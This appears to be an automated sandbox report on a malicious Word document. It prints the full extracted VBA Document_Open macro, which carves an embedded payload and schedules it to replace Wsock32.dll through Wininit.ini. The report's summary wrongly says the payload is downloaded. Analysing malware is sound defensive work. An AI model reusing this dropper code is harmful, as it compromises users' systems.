Verdict: MALICIOUS
Risk score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an OLE document with a high-severity heuristic indicating the presence of VBA macros, specifically a Document_Open macro. The ClamAV detection further confirms its malicious nature. The VBA script contains numerous API calls to KERNEL32 and LZ32, suggesting it is designed to download and execute a secondary payload, a common technique for malware droppers.
Heuristics (3)

- ClamAV: Doc.Dropper.Agent-6571561-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6571561-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9816 bytes | 2c2f9437fab78d97bfabb62b1ed6f42a7fd17cd0c9f4990486e7ffad9d70540b |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Sub GetWindowsDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long)
Private Declare Sub GetSystemDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long)
Private Declare Sub CopyFileA Lib "KERNEL32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Function GetFileAttributesA Lib "KERNEL32" (ByVal s As String) As Long
Private Declare Sub lstrcatA Lib "KERNEL32" (ByVal dst As String, ByVal src As String)
Private Declare Function lstrlenA Lib "KERNEL32" (ByVal s As String) As Long
Private Declare Function LZOpenFileA Lib "LZ32" (ByVal s As String, ByVal o As String, ByVal mode As Long) As Long
Private Declare Sub LZCopy Lib "LZ32" (ByVal src As Long, ByVal dst As Long)
Private Declare Sub LZClose Lib "LZ32" (ByVal h As Long)
Private Declare Function OpenFile Lib "KERNEL32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "KERNEL32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Sub SeekFile Lib "KERNEL32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long)
Private Declare Sub ReadFile Lib "KERNEL32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "KERNEL32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile1 Lib "KERNEL32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As String, ByVal n As Long)
Private Declare Sub CloseFile Lib "KERNEL32" Alias "_lclose" (ByVal h As Long)
Private Declare Function GlobalAlloc Lib "KERNEL32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub GlobalFree Lib "KERNEL32" (ByVal ptr As Long)
Private Sub Document_Open()
If InStr(1, System.OperatingSystem, "Windows") <> 0 Then
Dim ws1 As String, ws2 As String
ws1 = String(256, "X")
GetSystemDirectoryA ws1, 256
ws2 = ws1
lstrcatA ws1, "\Wsock32.dll"
lstrcatA ws2, "\Wsock33.dll"
If GetFileAttributesA(ws2) = -1 Then
Dim ai As String, dt1 As String, dt2 As String, wi As String
Dim h As Long, g As Long, p As Long, ofs1 As String, ofs2 As String
Dim w As String
ai = ws1
GetWindowsDirectoryA ai, 256
dt1 = ai
dt2 = ai
wi = ai
ofs1 = ai
ofs2 = ai
lstrcatA ai, "\Anthrax.ini"
lstrcatA dt1, "\DLL.lzh"
lstrcatA dt2, "\DLL.tmp"
lstrcatA wi, "\Wininit.ini"
CopyFileA ActiveDocument.FullName, ai, 0
p = GlobalAlloc(0, 6712)
h = OpenFile(ai, 0)
SeekFile h, 32256, 0
ReadFile h, p, 6712
CloseFile h
h = CreateFile(dt1, 0)
WriteFile h, p, 6712
CloseFile h
GlobalFree (ptr)
h = LZOpenFileA(dt1, ofs1, 0)
g = LZOpenFileA(dt2, ofs2, 4096)
LZCopy h, g
LZClose g
LZClose h
w = "[rename]" & Chr(13) & Chr(10) & "nul=" & String(1010, 0)
lstrcatA w, dt1
lstrcatA w, Chr(13) & Chr(10) & Chr(0)
lstrcatA w, ws2
lstrcatA w, "="
lstrcatA w, ws1
lstrcatA w, Chr(13) & Chr(10) & Chr(0)
lstrcatA w, ws1
lstrcatA w, "="
lstrcatA w, dt2
h = CreateFile(wi, 0)
WriteFile1 h, w, lstrlenA(w)
CloseFile h
End If
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/893dbb88d4e34cff8f3f6d1b4b16add8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7718 bytes
' Line #0:
' FuncDefn (Private Declare Sub GetWindowsDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long))
' Line #1:
' FuncDefn (Private Declare Sub GetSystemDirectoryA Lib "KERNEL32" (ByVal s As String, ByVal l As Long))
' Line #2:
' FuncDefn (Private Declare Sub CopyFileA Lib "KERNEL32" (ByVal src As String, ByVal dst As String, ByVal mode As Long))
' Line #3:
' FuncDefn (Private Declare Function GetFileAttributesA Lib "KERNEL32" (ByVal s As String) As Long)
' Line #4:
' FuncDefn (Private Declare Sub lstrcatA Lib "KERNEL32" (ByV
... (truncated)
```